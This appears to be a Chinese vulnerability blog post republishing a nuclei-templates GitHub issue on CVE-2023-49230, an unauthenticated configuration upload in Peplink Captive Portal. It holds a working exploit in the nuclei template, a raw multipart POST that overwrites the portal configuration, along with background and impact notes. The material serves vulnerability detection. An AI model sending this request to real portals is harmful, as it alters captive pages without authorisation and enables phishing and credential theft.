Peplink Captive Portal Unauthenticated Config Upload Vulnerability

漏洞信息

漏洞名称: Peplink Captive Portal Unauthenticated Config Upload Vulnerability

漏洞编号:

  • CVE: CVE-2023-49230

漏洞类型: 文件上传

漏洞等级: 高危

漏洞描述: ### 受影响产品
Peplink Captive Portal是Peplink公司提供的一种网络门户解决方案,广泛应用于企业、酒店、机场等公共场所的Wi-Fi网络接入控制。它允许网络管理员通过门户页面管理用户访问权限,包括认证、条款接受等。由于其广泛部署,该漏洞的影响范围较大。

漏洞说明

该漏洞属于未授权文件上传类型,具体存在于/guest/portal_admin_upload.cgi接口。攻击者无需认证即可通过构造特定的HTTP请求,上传恶意配置文件。上传的配置可通过/guest/preview.cgi?portal_id=1接口查看效果。漏洞的根本原因在于缺乏对上传操作的适当认证和输入验证,导致攻击者可以绕过安全限制,上传任意配置。

影响分析

此漏洞允许攻击者未授权上传恶意配置,可能导致多种安全风险,包括但不限于:修改门户页面内容,注入恶意脚本或链接,进行钓鱼攻击;篡改用户登录流程,窃取用户凭证;甚至可能通过进一步利用,导致服务器端代码执行。由于漏洞利用无需认证,攻击门槛低,可被自动化工具大规模利用,对受影响系统构成严重威胁。

产品厂商: Peplink

产品名称: Peplink Captive Portal

来源: https://github.com/projectdiscovery/nuclei-templates/issues/12195

类型: projectdiscovery/nuclei-templates:github issues

来源概述

Is there an existing template for this?

  • I have searched the existing templates.

Nuclei Template

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
id: cve-2023-49230

info:
name: Peplink Captive Portal Unauthenticated Config Upload
author: srilakivarma
severity: high
description: |
Unauthenticated upload to /guest/portal_admin_upload.cgi with effect visible at /guest/preview.cgi?portal_id=1.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-49230
tags: cve, peplink, upload, unauth

http:
# Step 1: Upload configuration
- raw:
- |
POST /guest/portal_admin_upload.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------370611892836891531633729116268

-----------------------------370611892836891531633729116268
Content-Disposition: form-data; name="option"

edit_page
-----------------------------370611892836891531633729116268
Content-Disposition: form-data; name="mode"

submit
-----------------------------370611892836891531633729116268
Content-Disposition: form-data; name="portal_id"

1
-----------------------------370611892836891531633729116268
Content-Disposition: form-data; name="data"

{"status":"ok","config":{"login":{"access_mode":"open","message":"","tnc_content":"Terms and Conditions.","tnc_title":"Terms and Conditions","tnc_link":"terms","tnc_prompt":"I agree to #TNC_LINK#","back_login_button":"Back to Login","agree_button":"Injected","session_id1":" ","session_id2":" "},"common":{"hide_quota":"no","landing_url":"","logo_url":"logo.cgi?portal_id=1&type=preview","logo_url_def":"logo.cgi?default=1","uploaded_logo_size":0,"footer":"Powered by Peplink.","footer_default":"Powered by Peplink."},"success":{},"reach_quota":{},"quota":{"limit":{"data":0,"session_timeout":1800}}}}
-----------------------------370611892836891531633729116268
Content-Disposition: form-data; name="logo_action"

x
-----------------------------370611892836891531633729116268
Content-Disposition: form-data; name="logo"; filename=""
Content-Type: application/octet-stream

-----------------------------370611892836891531633729116268--

matchers:
- type: word
part: body
words:
- '"status": "save_success"'

Relevant dumped responses

1
[cve-2023-49230:word-1] [http] [high] https://redact.com/guest/portal_admin_upload.cgi

Anything else?

https://www.tenable.com/cve/CVE-2023-49230
https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf


Peplink Captive Portal Unauthenticated Config Upload Vulnerability
http://example.com/2025/07/06/github_1644031419/
作者
lianccc
发布于
2025年7月6日
许可协议